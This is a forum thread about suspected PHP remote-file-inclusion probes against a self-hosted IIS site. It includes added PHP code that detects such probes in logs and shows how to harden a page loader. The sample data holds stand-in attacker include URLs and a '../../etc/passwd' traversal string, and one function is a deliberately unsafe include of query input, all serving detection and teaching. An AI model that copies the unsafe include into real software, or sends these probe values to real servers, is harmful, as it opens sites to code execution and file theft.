
PHP security/vulnerability

Status
Not open for further replies.

teqmod

Technical User
Sep 13, 2004
303
US
Hi all, let me start by saying I know next to nothing about PHP, but I am seeing some very suspicious activity in our logs. What I am seeing is a bunch of hits similar to this:

loc=
My thought is someone is using our site as a proxy to another site where they are either blocked or illegal images are being accessed. I have checked the source IP addresses for the suspicious activity and they are all over the place. Is this something that can be stopped? Is it stopped through PHP or IIS? We are using PHP version 5.0.3.

Any information on this would be very helpful.

thanks
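As an added example (not code from this thread), here is a small PHP CLI script that does the first thing a sysadmin in this position needs: pull the suspicious hits out of the IIS logs and see which script and which parameter they are aimed at. It flags any query-string parameter whose value is itself a full URL, which is the shape of the "loc=" hits described above. The field order, the sample log lines, the hosts and the addresses are all constructed for the example; adjust the field list to match the `#Fields:` header of your own logs.

```php
<?php
// Added example, not code from the thread. Scans IIS W3C extended log lines for
// query-string parameters whose value is itself a URL, the shape of a remote-include
// probe. Assumed field order (adjust to your log's #Fields: header):
//   date time c-ip cs-method cs-uri-stem cs-uri-query sc-status

// Constructed sample lines; hosts and addresses are reserved documentation values.
$sampleLog = array(
    '#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status',
    '2004-09-13 10:01:02 203.0.113.5 GET /page.php loc=http://attacker.invalid/cmd.txt 200',
    '2004-09-13 10:01:09 198.51.100.7 GET /page.php loc=about 200',
    '2004-09-13 10:02:30 203.0.113.9 GET /index.php page=ftp://attacker.invalid/x.txt 404',
    '2004-09-13 10:02:41 203.0.113.9 GET /index.php page=http%3A%2F%2Fattacker.invalid%2Fx.txt 200',
    '2004-09-13 10:03:00 192.0.2.44 GET /images/logo.gif - 200',
);

function findRemoteIncludeProbes(array $logLines)
{
    $hits = array();
    foreach ($logLines as $line) {
        $line = trim($line);
        if ($line === '' || $line[0] === '#') {
            continue;                       // blank line or W3C directive line
        }
        $fields = preg_split('/\s+/', $line);
        if (count($fields) < 7) {
            continue;                       // not the layout we expect
        }
        list($date, $time, $clientIp, $method, $stem, $query, $status) = $fields;
        if ($query === '-') {
            continue;                       // request had no query string
        }
        parse_str($query, $params);         // also URL-decodes %3A%2F%2F and friends
        foreach ($params as $name => $value) {
            if (!is_string($value)) {
                continue;                   // array-style params (a[]=...) are not URLs
            }
            // A remote include needs a complete URL with a stream-wrapper scheme.
            if (preg_match('#^(https?|ftp)://#i', $value)) {
                $hits[] = array(
                    'time'   => "$date $time",
                    'client' => $clientIp,
                    'script' => $stem,
                    'param'  => $name,
                    'host'   => parse_url($value, PHP_URL_HOST),
                    'status' => (int) $status,
                );
            }
        }
    }
    return $hits;
}

$probes = findRemoteIncludeProbes($sampleLog);
printf("%d remote-include probe(s) found\n", count($probes));
foreach ($probes as $p) {
    // A 200 here only means the script ran; whether the remote file was actually
    // fetched and executed must be confirmed against outbound firewall/proxy logs.
    printf("%s  %-14s %s?%s=<url>  payload host %s  HTTP %d\n",
        $p['time'], $p['client'], $p['script'], $p['param'], $p['host'], $p['status']);
}

// Group by attacked script and parameter: that is the code to footprint first.
$byTarget = array();
foreach ($probes as $p) {
    $key = $p['script'] . '?' . $p['param'];
    $byTarget[$key] = isset($byTarget[$key]) ? $byTarget[$key] + 1 : 1;
}
arsort($byTarget);
foreach ($byTarget as $target => $n) {
    printf("%-25s %d probe(s)\n", $target, $n);
}
```

Run it against a real log by replacing `$sampleLog` with `file('ex040913.log')`. The grouped summary at the end tells you which scripts and parameters the developer needs to look at; the per-hit status codes are only a starting point, since a 200 does not show whether the remote file was fetched, which is what the outbound firewall logs are for.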
 
Unless there is something in page.php that is causing the redirect to this porn site, I doubt whether anything is actually happening. What is on page.php?
 
We do not have any redirects away from our site and there is no advertising.

I actually think I have found the problem. Here is an article that closely resembles what I am seeing.

 
Do you perform remote includes from a GET variable? Does anyone (wow)?
 
Unfortunately I do not know this. I do know that we are not pulling anything from the remote hosts that are referenced in our logs. From what I can tell from our logs, and from how much web traffic has increased, something is not right.
 
I think you should ask directly to your host.
They will be able to tell you whether it is harmless or not.
 
The easy way to tell whether this is just harmless try-ons or not is to emulate some of the requests being made of your site. See whether they take you somewhere they should not, or - if they are remote exploits - footprint your code to see what might be happening.

We can help here if you show us the receiving code.

Take a look at phpsec.org for best practice on securing your application.
 
We host our own site here, so there really is no one else to ask. I am the SysAdmin in charge of the outward-facing systems and know that we have no legitimate direct link to these other sites. I am fairly certain after my research in the logs that this is not legitimate traffic and people are exploiting a vulnerability.

Here are a couple of sites on this exact error, and I have confirmed a setting is open in the config. I need to verify with the developer that this will not hinder the site if we change the settings.


Here is the link to the SANS posting on PHP vulnerabilities:

and one article summarizing the vulnerability in detail:
 
'Exploiting a vulnerability' means that you think that the perps are successful. How are you determining this? I get 100 or so similar exploits on some of my upload sites each day, but none are ever successful.

Remember that any attempt to exploit the vulnerability will be logged in the exact format that you post about (as the exploit starts with a GET request). You will need, most probably, to do some analysis of the firewall (outbound) logs to determine whether any of the vulnerabilities are successful.

The status of allow_url_fopen is not a security hole unless you couple it with a script that uses unfiltered query data. Personally, I think this would be very unusual as it would be a truly 'schoolboy' error.
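To make the last point concrete, here is an added example (not code from the thread or from the poster's site) showing the "schoolboy" pattern beside a hardened version of the same page loader. The page names, the `pages/` directory and the sample request values are assumptions for illustration; the behaviour of `allow_url_fopen` on PHP 5.0 and of `allow_url_include` (which only exists from PHP 5.2) is as documented by PHP.

```php
<?php
// Added example, not code from the thread. Two ways a "page=" style loader can be
// written. Paths, page names and the pages/ directory are assumptions for illustration.

// 1. The pattern the post above calls a schoolboy error: the query value becomes the
//    include path. With allow_url_fopen=On (PHP 5.0/5.1; from 5.2 it is allow_url_include
//    that governs include) a URL here is fetched and executed; with it Off, a "../"
//    sequence still reaches arbitrary local files.
function loadPageUnsafe($page)
{
    include $page;          // $page arrives straight from $_GET['page']
}

// 2. Hardened: the request selects an entry from a fixed allowlist of local files and
//    the user-supplied string is never used as a path component at all.
$ALLOWED_PAGES = array(
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
);

function resolvePage($requested, array $allowed, $pageDir)
{
    if (!is_string($requested) || !isset($allowed[$requested])) {
        return null;        // unknown key: URLs, "../" sequences and wrappers all land here
    }
    return $pageDir . DIRECTORY_SEPARATOR . $allowed[$requested];
}

function loadPageSafe($requested, array $allowed, $pageDir)
{
    $path = resolvePage($requested, $allowed, $pageDir);
    if ($path === null) {
        header('HTTP/1.0 404 Not Found');
        error_log('rejected page request: ' . var_export($requested, true));
        return false;
    }
    include $path;
    return true;
}

// Dry run over constructed request values (resolves only; nothing is included here).
$pageDir = dirname(__FILE__) . '/pages';
$samples = array('home', 'about', 'http://attacker.invalid/cmd.txt', '../../etc/passwd', null);
foreach ($samples as $value) {
    $resolved = resolvePage($value, $ALLOWED_PAGES, $pageDir);
    printf("%-35s -> %s\n", var_export($value, true),
        $resolved === null ? 'REJECTED' : $resolved);
}
```

In the real page the call would be `loadPageSafe(isset($_GET['page']) ? $_GET['page'] : null, $ALLOWED_PAGES, $pageDir)`. The allowlist is the actual fix; turning `allow_url_fopen` off in php.ini (check the current value with `ini_get('allow_url_fopen')`) is defence in depth that also stops `fopen()` and `file_get_contents()` on URLs, which is exactly what the developer has to confirm the site does not rely on before the setting is changed.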
 